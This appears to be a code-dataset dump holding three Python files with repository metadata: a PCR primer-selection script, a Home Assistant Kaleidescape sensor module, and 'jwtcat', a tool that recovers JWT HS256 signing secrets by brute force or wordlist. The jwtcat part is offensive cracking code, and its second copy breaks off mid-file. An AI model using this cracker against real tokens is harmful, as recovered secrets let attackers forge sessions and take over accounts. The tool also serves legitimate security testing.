] | 1 | 2021-03-24T22:33:11.000Z | 2021-03-24T22:33:11.000Z | primer_evauation.py | eastgenomics/primer_designer | 5332d82a4bf1079c985976a9b7b6a04f9573b38a | [
"MIT"
] | null | null | null | #!/usr/bin/python
#
#
#
#
# Kim Brugger (21 Oct 2015), contact: kbr@brugger.dk
import sys
import os
import pprint
pp = pprint.PrettyPrinter(indent=4)
import re
FLANK = 500
NR_PRIMERS = 4
ALLOWED_MISMATCHES = 4
MAX_MAPPINGS = 5
MAX_PRODUCT_SIZE = 800
MIN_PRODUCT_SIZE = 120
smalt_file = '8:96259936.smalt'
if ( sys.argv >= 1 ):
smalt_file = sys.argv[1]
region = smalt_file.rstrip(".smalt")
(chromo, pos) = region.split(":")
(start_pos, end_pos) = map(int, pos.split("-"))
primer_data = check_primers( smalt_file )
#pp.pprint( primer_data )
pcr_products = digital_PCR( primer_data )
pcr_products = check_PCR_products( pcr_products, chromo, start_pos, end_pos )
fwd_primer, rev_primer = pick_best_primers(primer_data, chromo, start_pos, end_pos)
print " Picked Primer Pair ( %s, %s )" % ( fwd_primer, rev_primer)
print "SMALT FILE :: %s " % smalt_file
| 29.386167 | 149 | 0.521624 | #!/usr/bin/python
#
#
#
#
# Kim Brugger (21 Oct 2015), contact: kbr@brugger.dk
import sys
import os
import pprint
pp = pprint.PrettyPrinter(indent=4)
import re
FLANK = 500
NR_PRIMERS = 4
ALLOWED_MISMATCHES = 4
MAX_MAPPINGS = 5
MAX_PRODUCT_SIZE = 800
MIN_PRODUCT_SIZE = 120
def check_primers( smalt_results ):
id_word = "FULLSEQ"
match = {}
smalt_report = []
query_region = []
res = dict()
with open(smalt_results, 'rU') as smalt_output:
for line in smalt_output:
if (line.startswith("@")):
continue
line = line.rstrip("\n")
fields = line.split("\t")
# pp.pprint( fields )
match[ 'name' ] = fields[ 0 ] #mapping_score
match[ 'chromosome' ] = fields[ 2 ] #chromosome
match[ 'pos' ] = fields[ 3 ] #mapping position
match[ 'length' ] = len(fields[ 9 ]) #mapping_score
match[ 'length_matched' ] = int(re.sub("AS:i:", '', fields[ 12 ])) #mapping_length
match_id = fields[ 0 ]
match_chr = fields[ 2 ]
match_pos = fields[ 3 ]
match_length = len(fields[ 9 ])
match_mathes = int(re.sub("AS:i:", '', fields[ 12 ]))
if ( match_id not in res ):
res[ match_id ] = dict()
res[ match_id ][ 'CHR' ] = []
res[ match_id ][ 'POS' ] = []
if (match['length'] <= match['length_matched'] + ALLOWED_MISMATCHES):
res[ match_id ][ 'CHR' ].append( match_chr )
res[ match_id ][ 'POS' ].append( match_pos )
# smalt_report.append()
for primer in res.keys() :
if (primer == 'FULLSEQ'):
continue
res[ primer ]['MAPPING_SUMMARY'] = 'unique mapping'
nr_of_chromosomes = len(set(res[ primer ][ 'CHR' ]))
nr_of_mappings = len( res[ primer ][ 'POS' ])
if (nr_of_mappings > 1 and nr_of_mappings <= MAX_MAPPINGS ):
res[ primer ]['MAPPING_SUMMARY'] = '%d mappings' % nr_of_mappings
res[ primer ][ 'MAPPING_SUMMARY' ] += " to chromosomes: " + ",".join(set ( res[ primer ][ 'CHR' ] ))
elif (nr_of_mappings >= MAX_MAPPINGS ):
res[ primer ]['MAPPING_SUMMARY'] = '%d mappings' % nr_of_mappings
res[ primer ][ 'MAPPING_SUMMARY' ] += " on %d chromosomes" % nr_of_chromosomes
# pp.pprint( smalt_report)
# pp.pprint( res )
return res
def digital_PCR( primer_mappings ):
# pp.pprint( primer_mappings )
primer_names = sorted(primer_mappings.keys())
nr_primer_names = len( primer_names )
mappings = {}
products = {}
for i in range(0, nr_primer_names):
primer1 = primer_names[ i ]
if ( primer1 == 'FULLSEQ'):
continue
if ( not re.search(r'LEFT', primer1 )):
continue
mappings[ primer1 ] = {}
products[ primer1 ] = {}
for j in range(0, nr_primer_names):
primer2 = primer_names[ j ]
if ( primer2 == 'FULLSEQ'):
continue
if ( not re.search(r'RIGHT', primer2 )):
continue
mappings[ primer1 ][ primer2 ] = []
products[ primer1 ][ primer2 ] = []
# print " -- %s vs %s" % (primer1, primer2)
for chr_index1 in range(0, len(primer_mappings[ primer1 ][ 'CHR' ])):
for chr_index2 in range(0, len(primer_mappings[ primer2 ][ 'CHR' ])):
chr1 = primer_mappings[ primer1 ][ 'CHR' ][ chr_index1 ]
chr2 = primer_mappings[ primer2 ][ 'CHR' ][ chr_index2 ]
if ( chr1 != chr2 ):
continue
pos1 = int( primer_mappings[ primer1 ][ 'POS' ][ chr_index1 ] )
pos2 = int( primer_mappings[ primer2 ][ 'POS' ][ chr_index2 ] )
product_size = ( pos2 - pos1 )
# if ( product_size > MAX_PRODUCT_SIZE ):
# continue
# if ( product_size < 0 or
# product_size > MAX_PRODUCT_SIZE ):
# continue
# if ( product_size < MIN_PRODUCT_SIZE ):
# continue
# print " %s:%d vs %s:%d ==> %d" % ( chr1, pos1, chr2, pos2, product_size )
mappings[ primer1 ][ primer2 ].append( product_size )
products[ primer1 ][ primer2 ].append( {'chr' : chr1, 'start_pos': pos1, 'end_pos': pos2, 'size': product_size} )
# print "\n"
# pp.pprint( products )
return products
exit()
longest_product = 0
longest_product_primer_pairs = ()
for primer1 in mappings.keys():
for primer2 in mappings[ primer1 ].keys():
if ( len( mappings[ primer1 ][ primer2 ]) == 0 ):
print "No usable pcr product from %s and %s" % ( primer1, primer2 )
continue
elif ( len( mappings[ primer1 ][ primer2 ]) > 1 ):
print "multiple pcr products from %s and %s" % ( primer1, primer2 )
continue
print "%s + %s > %s bp " % (primer1, primer2, mappings[ primer1 ][ primer2 ][ 0 ])
if ( mappings[ primer1 ][ primer2 ][0] > longest_product ):
longest_product = mappings[ primer1 ][ primer2 ][ 0 ]
longest_product_primer_pairs = ( primer1, primer2 )
# print "%s > %s (post)" % (longest_product, mappings[ primer1 ][ primer2 ][ 0 ])
print "\n\nLongest product (%d bp) comes from the %s and %s primer pair" % (longest_product,
longest_product_primer_pairs[0],
longest_product_primer_pairs[1])
def check_PCR_products(products, target_chr, target_start, target_end):
# pp.pprint( products )
failed_primer_pairs = []
for primer1 in products:
for primer2 in products[ primer1 ]:
good_products = []
bad_products = []
for product in products[ primer1 ][ primer2 ]:
# pp.pprint( product )
if ( product['end_pos'] - product['start_pos'] + 1 < MIN_PRODUCT_SIZE or
product['end_pos'] - product['start_pos'] + 1 > MAX_PRODUCT_SIZE):
# print "Wrong product size: %d " % ( product['end_pos'] - product['start_pos'] + 1 )
pass
# product = {}
elif ( target_chr != product[ 'chr' ] ):
print " mis priming on diff chromosome "
# products[ primer1 ][ primer2 ] = []
bad_products.append( product )
elif( target_start < product['start_pos'] or target_end > product['end_pos'] ):
print "%s > %s or %s < %s " % ( target_start, product['start_pos'], target_end, product['end_pos'] )
print "wrong region ( %s & %s )" % ( primer1, primer2)
bad_products.append( product )
# products[ primer1 ][ primer2 ] = []
else:
good_products.append( product )
products[ primer1 ][ primer2 ] = { 'good': good_products, 'bad' : bad_products }
# pp.pprint( products )
return products
smalt_file = '8:96259936.smalt'
def pick_best_primers( primer_data, chromo, start_pos, end_pos ):
# Finally we are getting to the crux of this whole ordeal: Pick the best primers.
# I will be done using the following rules:
# Unique MAPPING primers are best
# primers closest to the region of interest
# Primers generating odd products are eliminated.
# First group the primers according to the region.
# pp.pprint( primer_data )
# pp.pprint( pcr_products )
(closest_fwd, dist_fwd) = (None, None)
(closest_rev, dist_rev) = (None, None)
for primer in primer_data:
if ( primer == 'FULLSEQ'):
continue
if ( primer_data[ primer][ 'MAPPING_SUMMARY' ] != 'unique mapping'):
print "Non unique mapping ( %s )" % primer
continue
if ( primer_data[ primer ][ 'CHR' ][ 0 ] != chromo ):
print "Unique mapping to different chromosome (%s). Should never happen! " % primer
continue
if (primer.find( 'LEFT' ) >= 0):
primer_dist = start_pos - int (primer_data[ primer ][ 'POS' ][ 0 ]) + 1
if ( primer_dist < 0 ):
print "Primer %s downstream of region ! ( %d [%d, %d])" % (primer, primer_dist, start_pos, int (primer_data[ primer ][ 'POS' ][ 0 ]))
continue
if ( dist_fwd is None or primer_dist < dist_fwd):
dist_fwd = primer_dist
closest_fwd = primer
continue
elif( primer.find( 'RIGHT' ) >= 0):
primer_dist = int (primer_data[ primer ][ 'POS' ][ 0 ]) - end_pos + 1
if ( primer_dist < 0 ):
print "Primer %s uptream of region ! (%d)" % (primer, primer_dist)
continue
if ( dist_rev is None or primer_dist < dist_rev ):
dist_rev = primer_dist
closest_rev = primer
continue
return closest_fwd, closest_rev
if ( sys.argv >= 1 ):
smalt_file = sys.argv[1]
region = smalt_file.rstrip(".smalt")
(chromo, pos) = region.split(":")
(start_pos, end_pos) = map(int, pos.split("-"))
primer_data = check_primers( smalt_file )
#pp.pprint( primer_data )
pcr_products = digital_PCR( primer_data )
pcr_products = check_PCR_products( pcr_products, chromo, start_pos, end_pos )
fwd_primer, rev_primer = pick_best_primers(primer_data, chromo, start_pos, end_pos)
print " Picked Primer Pair ( %s, %s )" % ( fwd_primer, rev_primer)
print "SMALT FILE :: %s " % smalt_file
| 9,174 | 0 | 108 |
468b7ced0e8f8a70318c5c31ab90dbec90b9c0e1 | 6,722 | py | Python | homeassistant/components/kaleidescape/sensor.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 30,023 | 2016-04-13T10:17:53.000Z | 2020-03-02T12:56:31.000Z | homeassistant/components/kaleidescape/sensor.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 24,710 | 2016-04-13T08:27:26.000Z | 2020-03-02T12:59:13.000Z | homeassistant/components/kaleidescape/sensor.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 11,956 | 2016-04-13T18:42:31.000Z | 2020-03-02T09:32:12.000Z | """Sensor platform for Kaleidescape integration."""
from __future__ import annotations
from dataclasses import dataclass
from typing import TYPE_CHECKING
from homeassistant.components.sensor import SensorEntity, SensorEntityDescription
from homeassistant.const import PERCENTAGE
from homeassistant.helpers.entity import EntityCategory
from .const import DOMAIN as KALEIDESCAPE_DOMAIN
from .entity import KaleidescapeEntity
if TYPE_CHECKING:
from collections.abc import Callable
from kaleidescape import Device as KaleidescapeDevice
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import StateType
@dataclass
class BaseEntityDescriptionMixin:
"""Mixin for required descriptor keys."""
value_fn: Callable[[KaleidescapeDevice], StateType]
@dataclass
class KaleidescapeSensorEntityDescription(
SensorEntityDescription, BaseEntityDescriptionMixin
):
"""Describes Kaleidescape sensor entity."""
SENSOR_TYPES: tuple[KaleidescapeSensorEntityDescription, ...] = (
KaleidescapeSensorEntityDescription(
key="media_location",
name="Media Location",
icon="mdi:monitor",
value_fn=lambda device: device.automation.movie_location,
),
KaleidescapeSensorEntityDescription(
key="play_status",
name="Play Status",
icon="mdi:monitor",
value_fn=lambda device: device.movie.play_status,
),
KaleidescapeSensorEntityDescription(
key="play_speed",
name="Play Speed",
icon="mdi:monitor",
value_fn=lambda device: device.movie.play_speed,
),
KaleidescapeSensorEntityDescription(
key="video_mode",
name="Video Mode",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.video_mode,
),
KaleidescapeSensorEntityDescription(
key="video_color_eotf",
name="Video Color EOTF",
icon="mdi:monitor-eye",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.video_color_eotf,
),
KaleidescapeSensorEntityDescription(
key="video_color_space",
name="Video Color Space",
icon="mdi:monitor-eye",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.video_color_space,
),
KaleidescapeSensorEntityDescription(
key="video_color_depth",
name="Video Color Depth",
icon="mdi:monitor-eye",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.video_color_depth,
),
KaleidescapeSensorEntityDescription(
key="video_color_sampling",
name="Video Color Sampling",
icon="mdi:monitor-eye",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.video_color_sampling,
),
KaleidescapeSensorEntityDescription(
key="screen_mask_ratio",
name="Screen Mask Ratio",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.screen_mask_ratio,
),
KaleidescapeSensorEntityDescription(
key="screen_mask_top_trim_rel",
name="Screen Mask Top Trim Rel",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
native_unit_of_measurement=PERCENTAGE,
value_fn=lambda device: device.automation.screen_mask_top_trim_rel / 10.0,
),
KaleidescapeSensorEntityDescription(
key="screen_mask_bottom_trim_rel",
name="Screen Mask Bottom Trim Rel",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
native_unit_of_measurement=PERCENTAGE,
value_fn=lambda device: device.automation.screen_mask_bottom_trim_rel / 10.0,
),
KaleidescapeSensorEntityDescription(
key="screen_mask_conservative_ratio",
name="Screen Mask Conservative Ratio",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.screen_mask_conservative_ratio,
),
KaleidescapeSensorEntityDescription(
key="screen_mask_top_mask_abs",
name="Screen Mask Top Mask Abs",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
native_unit_of_measurement=PERCENTAGE,
value_fn=lambda device: device.automation.screen_mask_top_mask_abs / 10.0,
),
KaleidescapeSensorEntityDescription(
key="screen_mask_bottom_mask_abs",
name="Screen Mask Bottom Mask Abs",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
native_unit_of_measurement=PERCENTAGE,
value_fn=lambda device: device.automation.screen_mask_bottom_mask_abs / 10.0,
),
KaleidescapeSensorEntityDescription(
key="cinemascape_mask",
name="Cinemascape Mask",
icon="mdi:monitor-star",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.cinemascape_mask,
),
KaleidescapeSensorEntityDescription(
key="cinemascape_mode",
name="Cinemascape Mode",
icon="mdi:monitor-star",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.cinemascape_mode,
),
)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up the platform from a config entry."""
device: KaleidescapeDevice = hass.data[KALEIDESCAPE_DOMAIN][entry.entry_id]
async_add_entities(
KaleidescapeSensor(device, description) for description in SENSOR_TYPES
)
class KaleidescapeSensor(KaleidescapeEntity, SensorEntity):
"""Representation of a Kaleidescape sensor."""
entity_description: KaleidescapeSensorEntityDescription
def __init__(
self,
device: KaleidescapeDevice,
entity_description: KaleidescapeSensorEntityDescription,
) -> None:
"""Initialize sensor."""
super().__init__(device)
self.entity_description = entity_description
self._attr_unique_id = f"{self._attr_unique_id}-{entity_description.key}"
self._attr_name = f"{self._attr_name} {entity_description.name}"
@property
def native_value(self) -> StateType:
"""Return value of sensor."""
return self.entity_description.value_fn(self._device)
| 35.946524 | 85 | 0.717792 | """Sensor platform for Kaleidescape integration."""
from __future__ import annotations
from dataclasses import dataclass
from typing import TYPE_CHECKING
from homeassistant.components.sensor import SensorEntity, SensorEntityDescription
from homeassistant.const import PERCENTAGE
from homeassistant.helpers.entity import EntityCategory
from .const import DOMAIN as KALEIDESCAPE_DOMAIN
from .entity import KaleidescapeEntity
if TYPE_CHECKING:
from collections.abc import Callable
from kaleidescape import Device as KaleidescapeDevice
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import StateType
@dataclass
class BaseEntityDescriptionMixin:
"""Mixin for required descriptor keys."""
value_fn: Callable[[KaleidescapeDevice], StateType]
@dataclass
class KaleidescapeSensorEntityDescription(
SensorEntityDescription, BaseEntityDescriptionMixin
):
"""Describes Kaleidescape sensor entity."""
SENSOR_TYPES: tuple[KaleidescapeSensorEntityDescription, ...] = (
KaleidescapeSensorEntityDescription(
key="media_location",
name="Media Location",
icon="mdi:monitor",
value_fn=lambda device: device.automation.movie_location,
),
KaleidescapeSensorEntityDescription(
key="play_status",
name="Play Status",
icon="mdi:monitor",
value_fn=lambda device: device.movie.play_status,
),
KaleidescapeSensorEntityDescription(
key="play_speed",
name="Play Speed",
icon="mdi:monitor",
value_fn=lambda device: device.movie.play_speed,
),
KaleidescapeSensorEntityDescription(
key="video_mode",
name="Video Mode",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.video_mode,
),
KaleidescapeSensorEntityDescription(
key="video_color_eotf",
name="Video Color EOTF",
icon="mdi:monitor-eye",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.video_color_eotf,
),
KaleidescapeSensorEntityDescription(
key="video_color_space",
name="Video Color Space",
icon="mdi:monitor-eye",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.video_color_space,
),
KaleidescapeSensorEntityDescription(
key="video_color_depth",
name="Video Color Depth",
icon="mdi:monitor-eye",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.video_color_depth,
),
KaleidescapeSensorEntityDescription(
key="video_color_sampling",
name="Video Color Sampling",
icon="mdi:monitor-eye",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.video_color_sampling,
),
KaleidescapeSensorEntityDescription(
key="screen_mask_ratio",
name="Screen Mask Ratio",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.screen_mask_ratio,
),
KaleidescapeSensorEntityDescription(
key="screen_mask_top_trim_rel",
name="Screen Mask Top Trim Rel",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
native_unit_of_measurement=PERCENTAGE,
value_fn=lambda device: device.automation.screen_mask_top_trim_rel / 10.0,
),
KaleidescapeSensorEntityDescription(
key="screen_mask_bottom_trim_rel",
name="Screen Mask Bottom Trim Rel",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
native_unit_of_measurement=PERCENTAGE,
value_fn=lambda device: device.automation.screen_mask_bottom_trim_rel / 10.0,
),
KaleidescapeSensorEntityDescription(
key="screen_mask_conservative_ratio",
name="Screen Mask Conservative Ratio",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.screen_mask_conservative_ratio,
),
KaleidescapeSensorEntityDescription(
key="screen_mask_top_mask_abs",
name="Screen Mask Top Mask Abs",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
native_unit_of_measurement=PERCENTAGE,
value_fn=lambda device: device.automation.screen_mask_top_mask_abs / 10.0,
),
KaleidescapeSensorEntityDescription(
key="screen_mask_bottom_mask_abs",
name="Screen Mask Bottom Mask Abs",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
native_unit_of_measurement=PERCENTAGE,
value_fn=lambda device: device.automation.screen_mask_bottom_mask_abs / 10.0,
),
KaleidescapeSensorEntityDescription(
key="cinemascape_mask",
name="Cinemascape Mask",
icon="mdi:monitor-star",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.cinemascape_mask,
),
KaleidescapeSensorEntityDescription(
key="cinemascape_mode",
name="Cinemascape Mode",
icon="mdi:monitor-star",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.cinemascape_mode,
),
)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up the platform from a config entry."""
device: KaleidescapeDevice = hass.data[KALEIDESCAPE_DOMAIN][entry.entry_id]
async_add_entities(
KaleidescapeSensor(device, description) for description in SENSOR_TYPES
)
class KaleidescapeSensor(KaleidescapeEntity, SensorEntity):
"""Representation of a Kaleidescape sensor."""
entity_description: KaleidescapeSensorEntityDescription
def __init__(
self,
device: KaleidescapeDevice,
entity_description: KaleidescapeSensorEntityDescription,
) -> None:
"""Initialize sensor."""
super().__init__(device)
self.entity_description = entity_description
self._attr_unique_id = f"{self._attr_unique_id}-{entity_description.key}"
self._attr_name = f"{self._attr_name} {entity_description.name}"
@property
def native_value(self) -> StateType:
"""Return value of sensor."""
return self.entity_description.value_fn(self._device)
| 0 | 0 | 0 |
9842462bbceae77c84a005622d5cad9050cc08cf | 9,334 | py | Python | jwtcat.py | xrzhev/jwtcat | 64dde89c2e2e7634d9f5d7bbb5a788952e04e345 | [
"Apache-2.0"
] | 1 | 2021-05-04T22:48:00.000Z | 2021-05-04T22:48:00.000Z | jwtcat.py | FDlucifer/jwtcat | 64dde89c2e2e7634d9f5d7bbb5a788952e04e345 | [
"Apache-2.0"
] | null | null | null | jwtcat.py | FDlucifer/jwtcat | 64dde89c2e2e7634d9f5d7bbb5a788952e04e345 | [
"Apache-2.0"
] | 1 | 2021-08-31T14:24:16.000Z | 2021-08-31T14:24:16.000Z | #!/usr/bin/env python3
# Copyright (C) 2017 - 2020 Alexandre Teyar
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import json
import logging
import os
import signal
import sys
import time
from datetime import datetime, timedelta
from itertools import chain, product
import coloredlogs
import jwt
from tqdm import tqdm
logger = logging.getLogger(__name__)
coloredlogs.install(level='DEBUG', milliseconds=True)
def parse_args():
"""This function parses the command line.
Returns:
[object] -- The parsed arguments
"""
parser = argparse.ArgumentParser(
description="A CPU-based JSON Web Token (JWT) cracker",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
subparsers = parser.add_subparsers(
dest='attack_mode',
title="Attack-mode",
required=True
)
brute_force_subparser = subparsers.add_parser(
"brute-force",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
brute_force_subparser.add_argument(
"-c", "--charset",
default="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",
dest="charset",
help="User-defined charset",
type=str,
required=False,
)
brute_force_subparser.add_argument(
"--increment-min",
default=1,
dest="increment_min",
help="Start incrementing at X",
type=int,
required=False,
)
brute_force_subparser.add_argument(
"--increment-max",
default=8,
dest="increment_max",
help="Stop incrementing at X",
type=int,
required=False,
)
cve_subparser = subparsers.add_parser(
"vulnerable",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
wordlist__subparser = subparsers.add_parser(
"wordlist",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
# Set the UTF-8 encoding and ignore error mode to avoid issues with the wordlist
wordlist__subparser.add_argument(
"-w", "--wordlist",
default=argparse.SUPPRESS,
dest="wordlist",
help="Wordlist of private key candidates",
required=True,
type=argparse.FileType(
'r',
encoding='UTF-8',
errors='ignore'
)
)
parser.add_argument(
"-lL", "--log-level",
default=logging.INFO,
dest="log_level",
# TODO: Improve how to retrieve all log levels
choices=[
'DEBUG',
'INFO',
],
help="Set the logging level",
type=str,
required=False,
)
parser.add_argument(
"-o", "--outfile",
dest="outfile",
help="Define outfile for recovered private keys",
required=False,
type=argparse.FileType(
'w+',
encoding='UTF-8',
errors='ignore'
)
)
parser.add_argument(
"--potfile-disable",
action='store_true',
default=False,
dest="potfile_disable",
help="Do not write potfile",
required=False,
)
parser.add_argument(
"--potfile-path",
default='jwtpot.potfile',
dest="potfile",
help="Specific path to potfile",
required=False,
type=argparse.FileType(
'a+',
encoding='UTF-8',
errors='ignore'
)
)
# parser.add_argument(
# "-tF", "--jwt-file",
# default=argparse.SUPPRESS,
# dest="token_file",
# help="File with JSON Web Tokens to attack",
# required=False,
# type=argparse.FileType(
# 'r',
# encoding='UTF-8',
# errors='ignore'
# )
# )
parser.add_argument(
default=argparse.SUPPRESS,
dest="token",
help="JSON Web Token to attack",
type=str
)
return parser.parse_args()
def bruteforce(charset, minlength, maxlength):
"""This function generates all the different possible combination in a given character space.
Arguments:
charset {string} -- The charset used to generate all possible candidates
minlength {integer} -- The minimum length for candiates generation
maxlength {integer} -- The maximum length for candiates generation
Returns:
[type] -- All the possible candidates
"""
return (''.join(candidate)
for candidate in chain.from_iterable(product(charset, repeat=i)
for i in range(minlength, maxlength + 1)))
def run(token, candidate):
"""This function checks if a candidate can decrypt a JWT token.
Arguments:
token {string} -- An encrypted JWT token to test
candidate {string} -- A candidate word for decoding
Returns:
[boolean] -- Result of the decoding attempt
"""
try:
payload = jwt.decode(token, candidate, algorithm='HS256')
return True
except jwt.exceptions.DecodeError:
logger.debug(f"DecodingError: {candidate}")
return False
except jwt.exceptions.InvalidTokenError:
logger.debug(f"InvalidTokenError: {candidate}")
return False
except Exception as ex:
logger.exception(f"Exception: {ex}")
sys.exit(1)
def is_vulnerable(args):
"""This function checks a JWT token against a well-known vulnerabilities.
Arguments:
args {object} -- The command-line arguments
"""
headers = jwt.get_unverified_header(args.token)
if headers['alg'] == "HS256":
logging.info("JWT vulnerable to HS256 guessing attacks")
elif headers['alg'] == "None":
logging.info("JWT vulnerable to CVE-2018-1000531")
def hs256_attack(args):
"""This function passes down different candidates to the run() function and is required
to handle different types of guessing attack.
Arguments:
args {object} -- The command-line arguments
"""
headers = jwt.get_unverified_header(args.token)
if not headers['alg'] == "HS256":
logging.error("JWT signed using an algorithm other than HS256.")
else:
tqdm_disable = True if args.log_level == "DEBUG" else False
if args.attack_mode == "brute-force":
# Count = ....
for candidate in tqdm(bruteforce(args.charset, args.increment_min, args.increment_max), disable=tqdm_disable):
if run(args.token, candidate):
return candidate
return None
elif args.attack_mode == "wordlist":
word_count = len(open(args.wordlist.name, "r",
encoding="utf-8").readlines())
for entry in tqdm(args.wordlist, disable=tqdm_disable, total=word_count):
if run(args.token, entry.rstrip()):
return entry.rstrip()
return None
if __name__ == "__main__":
main()
| 29.726115 | 238 | 0.610564 | #!/usr/bin/env python3
# Copyright (C) 2017 - 2020 Alexandre Teyar
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import json
import logging
import os
import signal
import sys
import time
from datetime import datetime, timedelta
from itertools import chain, product
import coloredlogs
import jwt
from tqdm import tqdm
logger = logging.getLogger(__name__)
coloredlogs.install(level='DEBUG', milliseconds=True)
def parse_args():
"""This function parses the command line.
Returns:
[object] -- The parsed arguments
"""
parser = argparse.ArgumentParser(
description="A CPU-based JSON Web Token (JWT) cracker",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
subparsers = parser.add_subparsers(
dest='attack_mode',
title="Attack-mode",
required=True
)
brute_force_subparser = subparsers.add_parser(
"brute-force",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
brute_force_subparser.add_argument(
"-c", "--charset",
default="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",
dest="charset",
help="User-defined charset",
type=str,
required=False,
)
brute_force_subparser.add_argument(
"--increment-min",
default=1,
dest="increment_min",
help="Start incrementing at X",
type=int,
required=False,
)
brute_force_subparser.add_argument(
"--increment-max",
default=8,
dest="increment_max",
help="Stop incrementing at X",
type=int,
required=False,
)
cve_subparser = subparsers.add_parser(
"vulnerable",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
wordlist__subparser = subparsers.add_parser(
"wordlist",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
# Set the UTF-8 encoding and ignore error mode to avoid issues with the wordlist
wordlist__subparser.add_argument(
"-w", "--wordlist",
default=argparse.SUPPRESS,
dest="wordlist",
help="Wordlist of private key candidates",
required=True,
type=argparse.FileType(
'r',
encoding='UTF-8',
errors='ignore'
)
)
parser.add_argument(
"-lL", "--log-level",
default=logging.INFO,
dest="log_level",
# TODO: Improve how to retrieve all log levels
choices=[
'DEBUG',
'INFO',
],
help="Set the logging level",
type=str,
required=False,
)
parser.add_argument(
"-o", "--outfile",
dest="outfile",
help="Define outfile for recovered private keys",
required=False,
type=argparse.FileType(
'w+',
encoding='UTF-8',
errors='ignore'
)
)
parser.add_argument(
"--potfile-disable",
action='store_true',
default=False,
dest="potfile_disable",
help="Do not write potfile",
required=False,
)
parser.add_argument(
"--potfile-path",
default='jwtpot.potfile',
dest="potfile",
help="Specific path to potfile",
required=False,
type=argparse.FileType(
'a+',
encoding='UTF-8',
errors='ignore'
)
)
# parser.add_argument(
# "-tF", "--jwt-file",
# default=argparse.SUPPRESS,
# dest="token_file",
# help="File with JSON Web Tokens to attack",
# required=False,
# type=argparse.FileType(
# 'r',
# encoding='UTF-8',
# errors='ignore'
# )
# )
parser.add_argument(
default=argparse.SUPPRESS,
dest="token",
help="JSON Web Token to attack",
type=str
)
return parser.parse_args()
def bruteforce(charset, minlength, maxlength):
"""This function generates all the different possible combination in a given character space.
Arguments:
charset {string} -- The charset used to generate all possible candidates
minlength {integer} -- The minimum length for candiates generation
maxlength {integer} -- The maximum length for candiates generation
Returns:
[type] -- All the possible candidates
"""
return (''.join(candidate)
for candidate in chain.from_iterable(product(charset, repeat=i)
for i in range(minlength, maxlength + 1)))
